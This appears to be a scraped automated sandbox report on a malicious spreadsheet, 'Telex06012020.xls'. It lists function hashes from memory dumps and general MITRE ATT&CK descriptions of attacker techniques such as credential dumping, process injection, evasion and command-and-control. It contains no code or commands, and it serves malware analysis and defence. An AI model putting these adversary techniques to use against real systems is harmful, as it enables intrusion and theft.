Opcode ID: 1613f12443f047906eb7147cef80aa58b17692eb3eb4ee8e04e6d10f662a1b4f
Instruction ID: 1e3d5a07b22699848616fd99d7e219f667cd2e54ce30d70e45b8a126ec51c706
Opcode Fuzzy Hash: 1613f12443f047906eb7147cef80aa58b17692eb3eb4ee8e04e6d10f662a1b4f
Instruction Fuzzy Hash: EEE012297097E1AFC7428718A4104E27FE69FC721432D80CBE485DF257C225EC07C792

Uniqueness

Uniqueness Score: -1.00%

Function 0817CB8C, Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.887839707.0000000008170000.00000040.00000001.sdmp, Offset: 08170000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 512648eacd638934af912f188eafdb4d55e9657bd723b108ab577de089b3226d
Instruction ID: cc53b66ec687640891249f23a60141aca720625c1000189cdfca23e444e2a55b
Opcode Fuzzy Hash: 512648eacd638934af912f188eafdb4d55e9657bd723b108ab577de089b3226d
Instruction Fuzzy Hash: 49D0A777900508DADB60AE06E5402E9F3B0FF90362F309A2FCE0195411EB3162FCC6E6

Uniqueness

Uniqueness Score: -1.00%

Function 0817B430, Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.887839707.0000000008170000.00000040.00000001.sdmp, Offset: 08170000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7732023b90326b13f5c0d5a1aa19a69a8aca2d312d83761d572ed4050f0a735f
Instruction ID: b11ebafe209b72e0ff520595b1e845df495fa654ea0906201b8d723eec1ceb78
Opcode Fuzzy Hash: 7732023b90326b13f5c0d5a1aa19a69a8aca2d312d83761d572ed4050f0a735f
Instruction Fuzzy Hash: DDE09A74A4420ACFDB14CF98D498BAEBBB1EF48326F154419E403A7261C778D842CB50

Uniqueness

Uniqueness Score: -1.00%

Function 034F9490, Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.876711967.00000000034F0000.00000040.00000001.sdmp, Offset: 034F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01ef9691f035a74f30efc54c7592c307de8da307c82dd7e080e3bca61102a285
Instruction ID: cd95d1273a9cc7efeb572678bd74c0671e4f6a0735180b693ab884556f7c835b
Opcode Fuzzy Hash: 01ef9691f035a74f30efc54c7592c307de8da307c82dd7e080e3bca61102a285
Instruction Fuzzy Hash: 04D0A7320787848FC3519B68EC8A8807BB4EF0972034900C2E0048B233DA20B8108796

Uniqueness

Uniqueness Score: -1.00%

Function 081749E9, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.887839707.0000000008170000.00000040.00000001.sdmp, Offset: 08170000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 367e811281e0b0862e74f094f96474417749fd0c3ee30b8fa6dcc8a052d80478
Instruction ID: 0459bed4a9e52bfd83d91b0325bca7ccdf948fe2fdb08259aa7d733ad2b15d31
Opcode Fuzzy Hash: 367e811281e0b0862e74f094f96474417749fd0c3ee30b8fa6dcc8a052d80478
Instruction Fuzzy Hash: 1AD05E1120D3E08BD70B876864251E53FB54D8B12539E04CEE0C2CF067C20A880B976A

Uniqueness

Uniqueness Score: -1.00%

Function 034F12E8, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.876711967.00000000034F0000.00000040.00000001.sdmp, Offset: 034F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2930655f07dad33dd3bf70bfe4d92b33e9c1a3e9d10f954ab297305037e5fae8
Instruction ID: 8a6ff73bfa9b29459d2f211d4d4fc8915f84dbfcab1c1e699af59a0dbc9fcb35
Opcode Fuzzy Hash: 2930655f07dad33dd3bf70bfe4d92b33e9c1a3e9d10f954ab297305037e5fae8
Instruction Fuzzy Hash: 37D0923204124DBBCF124F90EC02FDA3F2AFF08750F004002FB041446087B29471ABA9

Uniqueness

Uniqueness Score: -1.00%

Function 081739F5, Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.887839707.0000000008170000.00000040.00000001.sdmp, Offset: 08170000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ad0d190c10b2563bec77ada6eea8840b64a385dee574a7f761e2311d71c7747
Instruction ID: ec6d60c29a85ddd73c1d7ec0935ce6f8d294c07f373070677eeed827bd052352
Opcode Fuzzy Hash: 9ad0d190c10b2563bec77ada6eea8840b64a385dee574a7f761e2311d71c7747
Instruction Fuzzy Hash: 2ED092746092808FC7068B18D465495BBB1AE8621031AC2D6D4898F267CA259C46CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 081739E5, Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.887839707.0000000008170000.00000040.00000001.sdmp, Offset: 08170000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2eff9f46ce64e1d440ce2ab84810a27e2af42c54a295e1346399d517af513ad3
Instruction ID: 70f948dfdfa562f9887a13d83378af8c70fbc44b4e7b8288a9630b67c32483fb
Opcode Fuzzy Hash: 2eff9f46ce64e1d440ce2ab84810a27e2af42c54a295e1346399d517af513ad3
Instruction Fuzzy Hash: 2DD092706093829FCB068B14D465495BFB1BE8631431AC6D6D4898F263CA259C46CB91

Uniqueness

Uniqueness Score: -1.00%

Function 034F4291, Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.876711967.00000000034F0000.00000040.00000001.sdmp, Offset: 034F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35488084de873e2156ce4a3692c973d7146bacd2f364cdf3f96c021cd580fb0a
Instruction ID: baf4cdbe4e3d0cd4932f7be07cb32e3ab51f00151daffcb30bf1b5fe44298bf9
Opcode Fuzzy Hash: 35488084de873e2156ce4a3692c973d7146bacd2f364cdf3f96c021cd580fb0a
Instruction Fuzzy Hash: CDC08C3114B2604FCA608710EEDBBC03B20EF02B13F140083C0408B550DA305049C6E6

Uniqueness

Uniqueness Score: -1.00%

Function 034F12F0, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.876711967.00000000034F0000.00000040.00000001.sdmp, Offset: 034F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94599ffa441df0e88b70881c9ab0a28d3c85ecc1ada89b230e3ca306e77432fe
Instruction ID: 74dd1dc814954851197273f4f05d0274d6499b5377982bc3a3dc45e925e69bd0
Opcode Fuzzy Hash: 94599ffa441df0e88b70881c9ab0a28d3c85ecc1ada89b230e3ca306e77432fe
Instruction Fuzzy Hash: 63D0C53214460DBBDF125E91ED06F9A3F2AFB18750F148011BA15180A18772A571ABA5

Uniqueness

Uniqueness Score: -1.00%

Function 081752D9, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.887839707.0000000008170000.00000040.00000001.sdmp, Offset: 08170000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d3d13a1a7068eda2e5aad8c7ccf573556746694edcebb5d5b5e9af42b3457cb
Instruction ID: 3949d4f8bfdc09d7fec5f29b16e464d7e200744bcb67f8e5d761fccde1c185da
Opcode Fuzzy Hash: 5d3d13a1a7068eda2e5aad8c7ccf573556746694edcebb5d5b5e9af42b3457cb
Instruction Fuzzy Hash: E2D0121010E7D267DB17D7A444A00867FB19DC311039D58CDC0C1CF007C219550ED316

Uniqueness

Uniqueness Score: -1.00%

Function 08172358, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.887839707.0000000008170000.00000040.00000001.sdmp, Offset: 08170000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e855ee36b47037451fa8629d5434450c8fcb7e93cc4e23605cb6f9225388cd2a
Instruction ID: b3f1dc3cb5e9bdb3474a906302630be750eebe674d32481e0524d376b50579dc
Opcode Fuzzy Hash: e855ee36b47037451fa8629d5434450c8fcb7e93cc4e23605cb6f9225388cd2a
Instruction Fuzzy Hash: 27C080322000605B8784C60460004E6B7E9DFCD21633EC4CDE415E7206C737DC0347D0

Uniqueness

Uniqueness Score: -1.00%

Function 0817F868, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.887839707.0000000008170000.00000040.00000001.sdmp, Offset: 08170000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f636d419945e605cba14ef44fff8cb22d78b773d07913f6d5960ad65eceb55e4
Instruction ID: c94769a3ad33720272e43fb5df6321de685bfee6f6bfd9faeb88f8ff4ff1e838
Opcode Fuzzy Hash: f636d419945e605cba14ef44fff8cb22d78b773d07913f6d5960ad65eceb55e4
Instruction Fuzzy Hash: 6EB09236B250148BCA08AB9CB8450EDB335EAC8236790457BE61AC2841CB36496A8790

Uniqueness

Uniqueness Score: -1.00%

Function 0817F940, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.887839707.0000000008170000.00000040.00000001.sdmp, Offset: 08170000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58a8c212b30e798fe3f464436196a39b4006823a47a79af1350dbdd4f8ff2f48
Instruction ID: ca6b4dee660fb3d06b5c9526af242305837a576856747be9a3a793a8380f3d08
Opcode Fuzzy Hash: 58a8c212b30e798fe3f464436196a39b4006823a47a79af1350dbdd4f8ff2f48
Instruction Fuzzy Hash: 54B09236B05014CBDA08AB9CB8560EDB335EAC81A6B90457BE61AC2081CB36496A8680

Uniqueness

Uniqueness Score: -1.00%

Function 081741E0, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.887839707.0000000008170000.00000040.00000001.sdmp, Offset: 08170000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ed8067f592dd4b0c0ea45f995a2159dda07bfe335db3ad53b153f3f1b40721c
Instruction ID: bb9ed5a058593d6364702b50a14d2184205491ff0c5194f02736642456f19faa
Opcode Fuzzy Hash: 9ed8067f592dd4b0c0ea45f995a2159dda07bfe335db3ad53b153f3f1b40721c
Instruction Fuzzy Hash: 82C08C3AF011098FDB00CB94F8848DCF775FBC8325B00C022E10183102C731A021DB40

Uniqueness

Uniqueness Score: -1.00%

Function 081752AF, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.887839707.0000000008170000.00000040.00000001.sdmp, Offset: 08170000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef74f13994abd78344d0b4cde9dff0c222b572497ad8db8b5821b0f3ca324797
Instruction ID: 75bfba48be7cfb8cf81fdddfe565551cd248a87b331d19bfff58a8632826b1aa
Opcode Fuzzy Hash: ef74f13994abd78344d0b4cde9dff0c222b572497ad8db8b5821b0f3ca324797
Instruction Fuzzy Hash: 3ED09E3010D3C28FD712DBA8C568401FF75AE8631071D86DEC4858F153C624E844C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 034F1310, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.876711967.00000000034F0000.00000040.00000001.sdmp, Offset: 034F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac7bd2ab6df7988970e3a84861c4787e348bb533a0db31d8b77ed583645a5a73
Instruction ID: 0b307c857922fbd88251547ac6707bd127454ac6187f49bbc709c09a8b48a7bc
Opcode Fuzzy Hash: ac7bd2ab6df7988970e3a84861c4787e348bb533a0db31d8b77ed583645a5a73
Instruction Fuzzy Hash: 7CC04C36644408FEEB114E50BD46FA93B15B708311F188012B7156847183329132A668

Uniqueness

Uniqueness Score: -1.00%

Function 0817EFF7, Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.887839707.0000000008170000.00000040.00000001.sdmp, Offset: 08170000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 864847e3c2a4bac8518a6fb0bb5ed1d70d5ef2f8cca59ed022ca4f48dbfd69d9
Instruction ID: a9141c11041b6875d28f530199fbf2c43b195991a46833cdce1ab0fe6d6fd556
Opcode Fuzzy Hash: 864847e3c2a4bac8518a6fb0bb5ed1d70d5ef2f8cca59ed022ca4f48dbfd69d9
Instruction Fuzzy Hash: F5B01237B05014CBDE08A78CBC150ECF331FAC8177B800167F61AD2081CB36062786C5

Uniqueness

Uniqueness Score: -1.00%

Function 034F94A0, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.876711967.00000000034F0000.00000040.00000001.sdmp, Offset: 034F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b76679b0a354449729844e828cdbdd8dc5f87ab3334555cc76ca9f307cd6f9ad
Instruction ID: a0ccf6e4bed68dc0c69f5d0bbd707ad7c253f4111acce2a0e91a8f8d8fd4bd45
Opcode Fuzzy Hash: b76679b0a354449729844e828cdbdd8dc5f87ab3334555cc76ca9f307cd6f9ad
Instruction Fuzzy Hash: 03B092351602088F82409B68E448C00B3E8AB08A243118090E10C8B232C621F8008A40

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.
Tactics:	Persistence, Privilege Escalation
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use hidden users to mask the presence of user accounts they create. Every user account in macOS has a userID associated with it. When creating a user, you can specify the userID for that account.
Tactics:	Defense Evasion
Data Sources:	Authentication logs, File monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Telex06012020.xls

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Cryptography:

Compliance:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "Telex06012020.xls"

Indicators

Summary

Document Summary

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 114

General

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre